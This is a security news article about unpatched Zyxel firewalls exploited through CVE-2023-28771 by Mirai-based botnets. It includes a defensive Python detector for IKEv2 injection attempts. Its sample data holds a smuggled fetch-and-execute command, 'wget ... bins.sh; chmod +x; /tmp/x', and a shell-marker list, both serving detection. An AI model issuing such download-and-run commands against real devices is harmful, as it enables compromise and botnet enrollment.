Security scored: many Zyxel network devices still run on old software and are subject to cyber attacks
It costs nothing for hackers to add vulnerable devices to their botnet and use them in large-scale DDoS campaigns.
Zyxel network devices that have not been updated since a critical vulnerability was disclosed in April have become a prime target for attackers, who use them to build botnets and carry out DDoS attacks.
The vulnerability, tracked as CVE-2023-28771, allows an unauthenticated attacker to execute arbitrary code on Zyxel devices by sending a specially crafted IKEv2 packet. It affects Zyxel firewalls and VPN gateways in their default configuration. Zyxel released a patch on April 25, but many organizations still have not updated their devices.
At the end of May, Shadowserver, an organization that monitors Internet threats in real time, warned that many Zyxel devices had been compromised in attacks that continue to this day. Shadowserver recommended that every still-vulnerable device be treated as already infected.
Last week, Fortinet published its own research reporting a sharp increase in attack activity by various hacker groups in recent weeks. Most of the attacks use variants of Mirai, malware that scans for and exploits common vulnerabilities in routers and other IoT devices. Once a device is compromised, Mirai enrolls it in a botnet that can carry out large-scale DDoS attacks.
Meanwhile, a proof-of-concept exploit for the Zyxel vulnerability was published by researchers in early June, partly to spur owners of this equipment to update. Judging by the sheer number of devices still affected, that plan does not seem to have worked.
“Since the exploit module was published, there has been a constant surge of malicious activity. The analysis carried out by FortiGuard Labs showed a significant increase in the number of attacks since May. We also identified several botnets, including the Mirai-based Dark.IoT and another botnet which uses specialized DDoS attack methods,” security researcher Cara Lin said in a Fortinet report.
Lin specifically noted that over the past month, attacks exploiting CVE-2023-28771 were observed from numerous IP addresses, all targeting the command-injection flaw in the way Zyxel devices handle Internet Key Exchange (IKE) packets received on UDP port 500. The attacks used tools such as curl and wget to download malicious scripts from attacker-controlled servers.
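As an added example (not Fortinet's or Zyxel's code, and not the published exploit), the following Python script shows the kind of heuristic a network sensor could apply to UDP/500 traffic: parse the fixed IKEv2 header and flag datagrams whose body carries shell-like download commands of the kind described above. The packet samples, IP addresses and the marker list are constructed assumptions; the real exploit payload is not reproduced, and the script does not encode which firmware versions are vulnerable, so it is a triage aid rather than a substitute for patching.

```python
"""Heuristic detector for command-injection attempts carried in IKEv2 datagrams
(the delivery vehicle for CVE-2023-28771 attacks). Added example, not Zyxel's,
Fortinet's or the published exploit's code; all samples below are constructed."""
import re
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

IKE_UDP_PORT = 500
IKEV2_VERSION = 0x20      # major version 2, minor 0
IKE_SA_INIT = 34          # exchange type of the first IKEv2 message
IKE_HEADER_LEN = 28       # fixed header size, RFC 7296 section 3.1

# Tokens that never belong in a well-formed IKE message but are typical of a
# Mirai-style download stage ("wget http://.../x.sh; chmod +x x.sh; ./x.sh").
# The list is a heuristic assumption of this example, not Fortinet's signature.
SHELL_MARKERS = re.compile(rb"(wget\s|curl\s|chmod\s|/bin/sh|/tmp/|\$\(|`|;|\|)")


@dataclass
class IkeHeader:
    spi_i: int
    spi_r: int
    next_payload: int
    version: int
    exchange_type: int
    flags: int
    message_id: int
    length: int


def parse_ike_header(payload: bytes) -> Optional[IkeHeader]:
    """Parse the 28-byte IKEv2 header; None if the datagram is too short."""
    if len(payload) < IKE_HEADER_LEN:
        return None
    return IkeHeader(*struct.unpack("!QQBBBBII", payload[:IKE_HEADER_LEN]))


def suspicious_ike(payload: bytes) -> List[str]:
    """Return the reasons a UDP/500 payload looks like an injection attempt (empty if clean)."""
    reasons: List[str] = []
    hdr = parse_ike_header(payload)
    if hdr is None:
        return ["truncated IKE header"]
    if hdr.version != IKEV2_VERSION:
        reasons.append("unexpected IKE version 0x%02x" % hdr.version)
    if hdr.length != len(payload):
        reasons.append("header length %d != datagram length %d" % (hdr.length, len(payload)))
    body = payload[IKE_HEADER_LEN:]
    hits = sorted({m.decode(errors="replace").strip() for m in SHELL_MARKERS.findall(body)})
    if hits:
        reasons.append("shell markers in IKE body: " + ", ".join(hits))
    return reasons


def scan_datagrams(datagrams: List[Tuple[str, int, bytes]]) -> Dict[str, List[str]]:
    """datagrams are (src_ip, dst_port, payload); returns src_ip -> reasons for flagged sources."""
    flagged: Dict[str, List[str]] = {}
    for src, dport, payload in datagrams:
        if dport != IKE_UDP_PORT:      # plain IKE only; NAT-T on UDP/4500 is out of scope here
            continue
        reasons = suspicious_ike(payload)
        if reasons:
            flagged.setdefault(src, []).extend(reasons)
    return flagged


def build_ike(body: bytes, exchange_type: int = IKE_SA_INIT) -> bytes:
    """Build a datagram with a consistent IKEv2 header around body (demo helper only)."""
    hdr = struct.pack("!QQBBBBII", 0x1122334455667788, 0, 33, IKEV2_VERSION,
                      exchange_type, 0x08, 0, IKE_HEADER_LEN + len(body))
    return hdr + body


# Constructed samples (documentation IP ranges): a benign IKE_SA_INIT with a stub SA
# payload, a datagram carrying a Mirai-style download stage, and a NAT-T datagram.
SAMPLE_DATAGRAMS = [
    ("203.0.113.10", 500, build_ike(b"\x00\x00\x00\x08" + b"\x00" * 4)),
    ("198.51.100.7", 500, build_ike(
        b"x;wget http://198.51.100.7/bins.sh -O /tmp/x;chmod +x /tmp/x;/tmp/x")),
    ("192.0.2.99", 4500, b"\x00" * 4 + build_ike(b"")),
]

if __name__ == "__main__":
    for src, reasons in scan_datagrams(SAMPLE_DATAGRAMS).items():
        print(src, "->", "; ".join(reasons))
```

Fed a capture of UDP/500 datagrams from a sensor in front of the firewall, `scan_datagrams` returns the source addresses worth blocking and reviewing; a benign IKE_SA_INIT passes the header and length checks and contains none of the markers, while a datagram smuggling a download stage is reported with the tokens that triggered it.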
Given that a working exploit can be run directly against any exposed device, one would expect affected organizations to have patched long ago. Yet the continuing stream of successful exploitation attempts shows that a considerable number of companies have not.
“The presence of known vulnerabilities in corporate devices can lead to serious risks. Once attackers gain control of a vulnerable device, they can include it in their botnet, which will allow them to carry out various types of attacks, such as DDoS,” Lin said.
The Fortinet researcher added that organizations must set their priorities correctly and pay more attention to security: updates and patches need to be installed regularly, otherwise the company's entire internal infrastructure remains exposed to attack.